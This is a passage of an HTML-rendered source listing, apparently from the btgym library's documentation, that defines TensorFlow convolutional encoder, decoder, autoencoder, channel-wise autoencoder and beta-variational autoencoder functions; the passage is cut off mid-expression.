layer_i_config = [num_filters(int), filter_size(list), stride(list)]</span> <span class="sd"> pad: str, padding scheme: &#39;SAME&#39; or &#39;VALID&#39;</span> <span class="sd"> name: str, mame scope</span> <span class="sd"> reuse: bool</span> <span class="sd"> Returns:</span> <span class="sd"> list of tensors holding encoded features for every layer outer to inner,</span> <span class="sd"> level-wise list of encoding layers shapes, first ro last.</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">with</span> <span class="n">tf</span><span class="o">.</span><span class="n">variable_scope</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span><span class="p">):</span> <span class="n">layer_shapes</span> <span class="o">=</span> <span class="p">[</span><span class="n">x</span><span class="o">.</span><span class="n">get_shape</span><span class="p">()]</span> <span class="n">layer_outputs</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">layer_spec</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">layer_config</span><span class="p">,</span> <span class="mi">1</span><span class="p">):</span> <span class="n">x</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">nn</span><span class="o">.</span><span class="n">elu</span><span class="p">(</span> <span class="n">norm_layer</span><span class="p">(</span> <span class="n">conv2d</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">x</span><span class="p">,</span> <span class="n">num_filters</span><span class="o">=</span><span class="n">layer_spec</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;/conv_kernels_</span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">i</span> <span class="p">),</span> <span class="n">filter_size</span><span class="o">=</span><span class="n">layer_spec</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">stride</span><span class="o">=</span><span class="n">layer_spec</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="p">),</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;encoder_layer_</span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="p">)</span> <span class="n">layer_shapes</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">x</span><span class="o">.</span><span class="n">get_shape</span><span class="p">())</span> <span class="n">layer_outputs</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="k">return</span> <span class="n">layer_outputs</span><span class="p">,</span> <span class="n">layer_shapes</span></div> <div class="viewcode-block" id="conv2d_decoder"><a class="viewcode-back" href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.conv2d_decoder">[docs]</a><span class="k">def</span> <span class="nf">conv2d_decoder</span><span class="p">(</span><span class="n">z</span><span class="p">,</span> <span class="n">layer_shapes</span><span class="p">,</span> <span class="n">layer_config</span><span class="o">=</span><span class="p">(</span> <span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="p">),</span> <span class="n">pad</span><span class="o">=</span><span class="s1">&#39;SAME&#39;</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">tf</span><span class="o">.</span><span class="n">image</span><span class="o">.</span><span class="n">ResizeMethod</span><span class="o">.</span><span class="n">BILINEAR</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;decoder&#39;</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="kc">False</span><span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Defines convolutional decoder.</span> <span class="sd"> Args:</span> <span class="sd"> z: tensor holding encoded state</span> <span class="sd"> layer_shapes: level-wise list of matching encoding layers shapes, last to first.</span> <span class="sd"> layer_config: layers configuration list: [layer_1_config, layer_2_config,...], where:</span> <span class="sd"> layer_i_config = [num_filters(int), filter_size(list), stride(list)]</span> <span class="sd"> pad: str, padding scheme: &#39;SAME&#39; or &#39;VALID&#39;</span> <span class="sd"> resize_method: up-sampling method, one of supported tf.image.ResizeMethod&#39;s</span> <span class="sd"> name: str, mame scope</span> <span class="sd"> reuse: bool</span> <span class="sd"> Returns:</span> <span class="sd"> list of tensors holding decoded features for every layer inner to outer</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">with</span> <span class="n">tf</span><span class="o">.</span><span class="n">variable_scope</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span><span class="p">):</span> <span class="n">x</span> <span class="o">=</span> <span class="n">z</span> <span class="n">layer_shapes</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">layer_shapes</span><span class="p">)</span> <span class="n">layer_shapes</span><span class="o">.</span><span class="n">reverse</span><span class="p">()</span> <span class="n">layer_config</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">layer_config</span><span class="p">)</span> <span class="n">layer_config</span><span class="o">.</span><span class="n">reverse</span><span class="p">()</span> <span class="n">layer_output</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="p">(</span><span class="n">layer_spec</span><span class="p">,</span> <span class="n">layer_shape</span><span class="p">)</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="nb">zip</span><span class="p">(</span><span class="n">layer_config</span><span class="p">,</span><span class="n">layer_shapes</span><span class="p">[</span><span class="mi">1</span><span class="p">:]),</span> <span class="mi">1</span><span class="p">):</span> <span class="n">x</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">image</span><span class="o">.</span><span class="n">resize_images</span><span class="p">(</span> <span class="n">images</span><span class="o">=</span><span class="n">x</span><span class="p">,</span> <span class="n">size</span><span class="o">=</span><span class="p">[</span><span class="nb">int</span><span class="p">(</span><span class="n">layer_shape</span><span class="p">[</span><span class="mi">1</span><span class="p">]),</span> <span class="nb">int</span><span class="p">(</span><span class="n">layer_shape</span><span class="p">[</span><span class="mi">2</span><span class="p">])],</span> <span class="n">method</span><span class="o">=</span><span class="n">resize_method</span><span class="p">,</span> <span class="p">)</span> <span class="n">x</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">nn</span><span class="o">.</span><span class="n">elu</span><span class="p">(</span> <span class="n">conv2d</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">x</span><span class="p">,</span> <span class="n">num_filters</span><span class="o">=</span><span class="n">layer_spec</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;conv_kernels_</span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="n">filter_size</span><span class="o">=</span><span class="n">layer_spec</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">stride</span><span class="o">=</span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">],</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">),</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;decoder_layer_</span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="p">)</span> <span class="n">layer_output</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="n">y_hat</span> <span class="o">=</span> <span class="n">conv2d</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">x</span><span class="p">,</span> <span class="n">num_filters</span><span class="o">=</span><span class="n">layer_shapes</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">][</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;decoded_y_hat&#39;</span><span class="p">,</span> <span class="n">filter_size</span><span class="o">=</span><span class="n">layer_config</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span> <span class="n">stride</span><span class="o">=</span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">],</span> <span class="n">pad</span><span class="o">=</span><span class="s1">&#39;SAME&#39;</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="n">layer_output</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">y_hat</span><span class="p">)</span> <span class="k">return</span> <span class="n">layer_output</span></div> <div class="viewcode-block" id="conv2d_autoencoder"><a class="viewcode-back" href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.conv2d_autoencoder">[docs]</a><span class="k">def</span> <span class="nf">conv2d_autoencoder</span><span class="p">(</span> <span class="n">inputs</span><span class="p">,</span> <span class="n">layer_config</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">tf</span><span class="o">.</span><span class="n">image</span><span class="o">.</span><span class="n">ResizeMethod</span><span class="o">.</span><span class="n">BILINEAR</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="s1">&#39;SAME&#39;</span><span class="p">,</span> <span class="n">linear_layer_ref</span><span class="o">=</span><span class="n">linear</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;base_conv2d_autoencoder&#39;</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span> <span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Basic convolutional autoencoder.</span> <span class="sd"> Hidden state is passed through dense linear layer.</span> <span class="sd"> Args:</span> <span class="sd"> inputs: input tensor</span> <span class="sd"> layer_config: layers configuration list: [layer_1_config, layer_2_config,...], where:</span> <span class="sd"> layer_i_config = [num_filters(int), filter_size(list), stride(list)];</span> <span class="sd"> this list represent decoder part of autoencoder bottleneck,</span> <span class="sd"> decoder part is inferred symmetrically</span> <span class="sd"> resize_method: up-sampling method, one of supported tf.image.ResizeMethod&#39;s</span> <span class="sd"> pad: str, padding scheme: &#39;SAME&#39; or &#39;VALID&#39;</span> <span class="sd"> linear_layer_ref: linear layer class to use</span> <span class="sd"> name: str, mame scope</span> <span class="sd"> reuse: bool</span> <span class="sd"> Returns:</span> <span class="sd"> list of tensors holding encoded features, layer_wise from outer to inner</span> <span class="sd"> tensor holding batch-wise flattened hidden state vector</span> <span class="sd"> list of tensors holding decoded features, layer-wise from inner to outer</span> <span class="sd"> tensor holding reconstructed output</span> <span class="sd"> None value</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">with</span> <span class="n">tf</span><span class="o">.</span><span class="n">variable_scope</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span><span class="p">):</span> <span class="c1"># Encode:</span> <span class="n">encoder_layers</span><span class="p">,</span> <span class="n">shapes</span> <span class="o">=</span> <span class="n">conv2d_encoder</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">inputs</span><span class="p">,</span> <span class="n">layer_config</span><span class="o">=</span><span class="n">layer_config</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="c1"># Flatten hidden state, pass through dense :</span> <span class="n">z</span> <span class="o">=</span> <span class="n">batch_flatten</span><span class="p">(</span><span class="n">encoder_layers</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="n">h</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">c</span> <span class="o">=</span> <span class="n">encoder_layers</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">get_shape</span><span class="p">()</span><span class="o">.</span><span class="n">as_list</span><span class="p">()[</span><span class="mi">1</span><span class="p">:]</span> <span class="n">z</span> <span class="o">=</span> <span class="n">linear_layer_ref</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">z</span><span class="p">,</span> <span class="n">size</span><span class="o">=</span><span class="n">h</span> <span class="o">*</span> <span class="n">w</span> <span class="o">*</span> <span class="n">c</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;hidden_dense&#39;</span><span class="p">,</span> <span class="n">initializer</span><span class="o">=</span><span class="n">normalized_columns_initializer</span><span class="p">(</span><span class="mf">1.0</span><span class="p">),</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="c1"># Reshape back and feed to decoder:</span> <span class="n">decoder_layers</span> <span class="o">=</span> <span class="n">conv2d_decoder</span><span class="p">(</span> <span class="n">z</span><span class="o">=</span><span class="n">tf</span><span class="o">.</span><span class="n">reshape</span><span class="p">(</span><span class="n">z</span><span class="p">,</span> <span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">h</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">c</span><span class="p">]),</span> <span class="n">layer_config</span><span class="o">=</span><span class="n">layer_config</span><span class="p">,</span> <span class="n">layer_shapes</span><span class="o">=</span><span class="n">shapes</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">resize_method</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="n">y_hat</span> <span class="o">=</span> <span class="n">decoder_layers</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="k">return</span> <span class="n">encoder_layers</span><span class="p">,</span> <span class="n">z</span><span class="p">,</span> <span class="n">decoder_layers</span><span class="p">,</span> <span class="n">y_hat</span><span class="p">,</span> <span class="kc">None</span></div> <div class="viewcode-block" id="cw_conv2d_autoencoder"><a class="viewcode-back" href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.cw_conv2d_autoencoder">[docs]</a><span class="k">def</span> <span class="nf">cw_conv2d_autoencoder</span><span class="p">(</span> <span class="n">inputs</span><span class="p">,</span> <span class="n">layer_config</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">tf</span><span class="o">.</span><span class="n">image</span><span class="o">.</span><span class="n">ResizeMethod</span><span class="o">.</span><span class="n">BILINEAR</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="s1">&#39;SAME&#39;</span><span class="p">,</span> <span class="n">linear_layer_ref</span><span class="o">=</span><span class="n">linear</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;cw_conv2d_autoencoder&#39;</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span> <span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Channel-wise convolutional autoencoder.</span> <span class="sd"> Hidden state is passed through dense linear layer.</span> <span class="sd"> Pain-slow, do not use.</span> <span class="sd"> Args:</span> <span class="sd"> inputs: input tensor</span> <span class="sd"> layer_config: layers configuration list: [layer_1_config, layer_2_config,...], where:</span> <span class="sd"> layer_i_config = [num_filters(int), filter_size(list), stride(list)];</span> <span class="sd"> this list represent decoder part of autoencoder bottleneck,</span> <span class="sd"> decoder part is inferred symmetrically</span> <span class="sd"> resize_method: up-sampling method, one of supported tf.image.ResizeMethod&#39;s</span> <span class="sd"> pad: str, padding scheme: &#39;SAME&#39; or &#39;VALID&#39;</span> <span class="sd"> linear_layer_ref: linear layer class to use</span> <span class="sd"> name: str, mame scope</span> <span class="sd"> reuse: bool</span> <span class="sd"> Returns:</span> <span class="sd"> per-channel list of lists of tensors holding encoded features, layer_wise from outer to inner</span> <span class="sd"> tensor holding batch-wise flattened hidden state vector</span> <span class="sd"> per-channel list of lists of tensors holding decoded features, layer-wise from inner to outer</span> <span class="sd"> tensor holding reconstructed output</span> <span class="sd"> None value</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">with</span> <span class="n">tf</span><span class="o">.</span><span class="n">variable_scope</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span><span class="p">):</span> <span class="n">ae_bank</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">inputs</span><span class="o">.</span><span class="n">get_shape</span><span class="p">()</span><span class="o">.</span><span class="n">as_list</span><span class="p">()[</span><span class="o">-</span><span class="mi">1</span><span class="p">]):</span> <span class="c1"># Making list of list of AE&#39;s:</span> <span class="n">encoder_layers</span><span class="p">,</span> <span class="n">z</span><span class="p">,</span> <span class="n">decoder_layers</span><span class="p">,</span> <span class="n">y_hat</span><span class="p">,</span> <span class="n">_</span> <span class="o">=</span> <span class="n">conv2d_autoencoder</span><span class="p">(</span> <span class="n">inputs</span><span class="o">=</span><span class="n">inputs</span><span class="p">[</span><span class="o">...</span><span class="p">,</span> <span class="n">i</span><span class="p">][</span><span class="o">...</span><span class="p">,</span> <span class="kc">None</span><span class="p">],</span> <span class="n">layer_config</span><span class="o">=</span><span class="n">layer_config</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">resize_method</span><span class="p">,</span> <span class="n">linear_layer_ref</span><span class="o">=</span><span class="n">linear_layer_ref</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;ae_channel_</span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span> <span class="p">)</span> <span class="n">ae</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">(</span> <span class="n">inputs</span><span class="o">=</span><span class="n">inputs</span><span class="p">[</span><span class="o">...</span><span class="p">,</span> <span class="n">i</span><span class="p">][</span><span class="o">...</span><span class="p">,</span> <span class="kc">None</span><span class="p">],</span> <span class="n">encoder_layers</span><span class="o">=</span><span class="n">encoder_layers</span><span class="p">,</span> <span class="n">z</span><span class="o">=</span><span class="n">z</span><span class="p">,</span> <span class="n">decoder_layers</span><span class="o">=</span><span class="n">decoder_layers</span><span class="p">,</span> <span class="n">y_hat</span><span class="o">=</span><span class="n">y_hat</span><span class="p">,</span> <span class="p">)</span> <span class="n">ae_bank</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ae</span><span class="p">)</span> <span class="n">y_hat</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">z</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">cw_encoder_layers</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">cw_decoder_layers</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">ae</span> <span class="ow">in</span> <span class="n">ae_bank</span><span class="p">:</span> <span class="n">y_hat</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ae</span><span class="p">[</span><span class="s1">&#39;y_hat&#39;</span><span class="p">])</span> <span class="n">z</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ae</span><span class="p">[</span><span class="s1">&#39;z&#39;</span><span class="p">])</span> <span class="n">cw_encoder_layers</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ae</span><span class="p">[</span><span class="s1">&#39;encoder_layers&#39;</span><span class="p">])</span> <span class="n">cw_decoder_layers</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ae</span><span class="p">[</span><span class="s1">&#39;decoder_layers&#39;</span><span class="p">])</span> <span class="c1"># Flatten hidden state:</span> <span class="n">z</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">concat</span><span class="p">(</span><span class="n">z</span><span class="p">,</span> <span class="n">axis</span><span class="o">=-</span><span class="mi">1</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;hidden_state&#39;</span><span class="p">)</span> <span class="c1"># encoder_layers = []</span> <span class="c1"># for layer in zip(*cw_encoder_layers):</span> <span class="c1"># encoder_layers.append(tf.concat(layer, axis=-2))</span> <span class="c1">#</span> <span class="c1"># decoder_layers = []</span> <span class="c1"># for layer in zip(*cw_decoder_layers):</span> <span class="c1"># decoder_layers.append(tf.concat(layer, axis=-2))</span> <span class="c1"># Reshape back reconstruction:</span> <span class="n">y_hat</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">concat</span><span class="p">(</span><span class="n">y_hat</span><span class="p">,</span> <span class="n">axis</span><span class="o">=-</span><span class="mi">1</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;decoded_y_hat&#39;</span><span class="p">)</span> <span class="k">return</span> <span class="n">cw_encoder_layers</span><span class="p">,</span> <span class="n">z</span><span class="p">,</span> <span class="n">cw_decoder_layers</span><span class="p">,</span> <span class="n">y_hat</span><span class="p">,</span> <span class="kc">None</span></div> <div class="viewcode-block" id="beta_var_conv2d_autoencoder"><a class="viewcode-back" href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.beta_var_conv2d_autoencoder">[docs]</a><span class="k">def</span> <span class="nf">beta_var_conv2d_autoencoder</span><span class="p">(</span> <span class="n">inputs</span><span class="p">,</span> <span class="n">layer_config</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">tf</span><span class="o">.</span><span class="n">image</span><span class="o">.</span><span class="n">ResizeMethod</span><span class="o">.</span><span class="n">BILINEAR</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="s1">&#39;SAME&#39;</span><span class="p">,</span> <span class="n">linear_layer_ref</span><span class="o">=</span><span class="n">linear</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;vae_conv2d&#39;</span><span class="p">,</span> <span class="n">max_batch_size</span><span class="o">=</span><span class="mi">256</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="kc">False</span> <span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Variational autoencoder.</span> <span class="sd"> Papers:</span> <span class="sd"> https://arxiv.org/pdf/1312.6114.pdf</span> <span class="sd"> https://arxiv.org/pdf/1606.05908.pdf</span> <span class="sd"> http://www.matthey.me/pdf/betavae_iclr_2017.pdf</span> <span class="sd"> Args:</span> <span class="sd"> inputs: input tensor</span> <span class="sd"> layer_config: layers configuration list: [layer_1_config, layer_2_config,...], where:</span> <span class="sd"> layer_i_config = [num_filters(int), filter_size(list), stride(list)];</span> <span class="sd"> this list represent decoder part of autoencoder bottleneck,</span> <span class="sd"> decoder part is inferred symmetrically</span> <span class="sd"> resize_method: up-sampling method, one of supported tf.image.ResizeMethod&#39;s</span> <span class="sd"> pad: str, padding scheme: &#39;SAME&#39; or &#39;VALID&#39;</span> <span class="sd"> linear_layer_ref: linear layer class - not used</span> <span class="sd"> name: str, mame scope</span> <span class="sd"> max_batch_size: int, dynamic batch size should be no greater than this value</span> <span class="sd"> reuse: bool</span> <span class="sd"> Returns:</span> <span class="sd"> list of tensors holding encoded features, layer_wise from outer to inner</span> <span class="sd"> tensor holding batch-wise flattened hidden state vector</span> <span class="sd"> list of tensors holding decoded features, layer-wise from inner to outer</span> <span class="sd"> tensor holding reconstructed output</span> <span class="sd"> tensor holding estimated KL divergence</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">with</span> <span class="n">tf</span><span class="o">.</span><span class="n">variable_scope</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span><span class="p">):</span> <span class="c1"># Encode:</span> <span class="n">encoder_layers</span><span class="p">,</span> <span class="n">shapes</span> <span class="o">=</span> <span class="n">conv2d_encoder</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">inputs</span><span class="p">,</span> <span class="n">layer_config</span><span class="o">=</span><span class="n">layer_config</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="c1"># Flatten hidden state, pass through dense:</span> <span class="n">z_flat</span> <span class="o">=</span> <span class="n">batch_flatten</span><span class="p">(</span><span class="n">encoder_layers</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="n">h</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">c</span> <span class="o">=</span> <span class="n">encoder_layers</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">get_shape</span><span class="p">()</span><span class="o">.</span><span class="n">as_list</span><span class="p">()[</span><span class="mi">1</span><span class="p">:]</span> <span class="n">z</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">nn</span><span class="o">.</span><span class="n">elu</span><span class="p">(</span> <span class="n">linear</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">z_flat</span><span class="p">,</span> <span class="n">size</span><span class="o">=</span><span class="n">h</span> <span class="o">*</span> <span class="n">w</span> <span class="o">*</span> <span class="n">c</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;enc_dense&#39;</span><span class="p">,</span> <span class="n">initializer</span><span class="o">=</span><span class="n">normalized_columns_initializer</span><span class="p">(</span><span class="mf">1.0</span><span class="p">),</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="p">)</span> <span class="c1"># TODO: revert back to dubled Z-size</span> <span class="c1"># half_size_z = h * w * c</span> <span class="c1"># size_z = 2 * half_size_z</span> <span class="n">size_z</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">h</span> <span class="o">*</span> <span class="n">w</span> <span class="o">*</span> <span class="n">c</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span> <span class="n">z</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">nn</span><span class="o">.</span><span class="n">elu</span><span class="p">(</span> <span class="n">linear</span><span class="p">(</span> <span class="c1">#x=z_flat,</span> <span class="n">x</span><span class="o">=</span><span class="n">z</span><span class="p">,</span> <span class="c1">#size=size_z,</span> <span class="n">size</span><span class="o">=</span><span class="n">size_z</span> <span class="o">*</span> <span class="mi">2</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;hidden_dense&#39;</span><span class="p">,</span> <span class="n">initializer</span><span class="o">=</span><span class="n">normalized_columns_initializer</span><span class="p">(</span><span class="mf">1.0</span><span class="p">),</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="p">)</span> <span class="c1"># Get sample parameters:</span> <span class="c1">#mu, log_sigma = tf.split(z, [half_size_z, half_size_z], axis=-1)</span> <span class="n">mu</span><span class="p">,</span> <span class="n">log_sigma</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">z</span><span class="p">,</span> <span class="p">[</span><span class="n">size_z</span><span class="p">,</span> <span class="n">size_z</span><span class="p">],</span> <span class="n">axis</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span> <span class="c1"># Oversized noise generator:</span> <span class="c1">#eps = tf.random_normal(shape=[max_batch_size, half_size_z], mean=0., stddev=1.)</span> <span class="n">eps</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">random_normal</span><span class="p">(</span><span class="n">shape</span><span class="o">=</span><span class="p">[</span><span class="n">max_batch_size</span><span class="p">,</span> <span class="n">size_z</span><span class="p">],</span> <span class="n">mean</span><span class="o">=</span><span class="mf">0.</span><span class="p">,</span> <span class="n">stddev</span><span class="o">=</span><span class="mf">1.</span><span class="p">)</span> <span class="n">eps</span> <span class="o">=</span> <span class="n">eps</span><span class="p">[:</span><span class="n">tf</span><span class="o">.</span><span class="n">shape</span><span class="p">(</span><span class="n">z</span><span class="p">)[</span><span class="mi">0</span><span class="p">],:]</span> <span class="c1"># Get sample z ~ Q(z|X):</span> <span class="n">z_sampled</span> <span class="o">=</span> <span class="n">mu</span> <span class="o">+</span> <span class="n">tf</span><span class="o">.</span><span class="n">exp</span><span class="p">(</span><span class="n">log_sigma</span> <span class="o">/</span> <span class="mi">2</span><span class="p">)</span> <span class="o">*</span> <span class="n">eps</span> <span class="c1"># D_KL(Q(z|X) || P(z|X)):</span> <span class="c1"># TODO: where is sum?!</span> <span class="n">d_kl</span> <span class="o">=</span> <span class="mf">0.5</span> <span class="o">*</span> <span class="p">(</span><span class="n">tf</span><span class="o">.</span><span class="n">exp</span><span 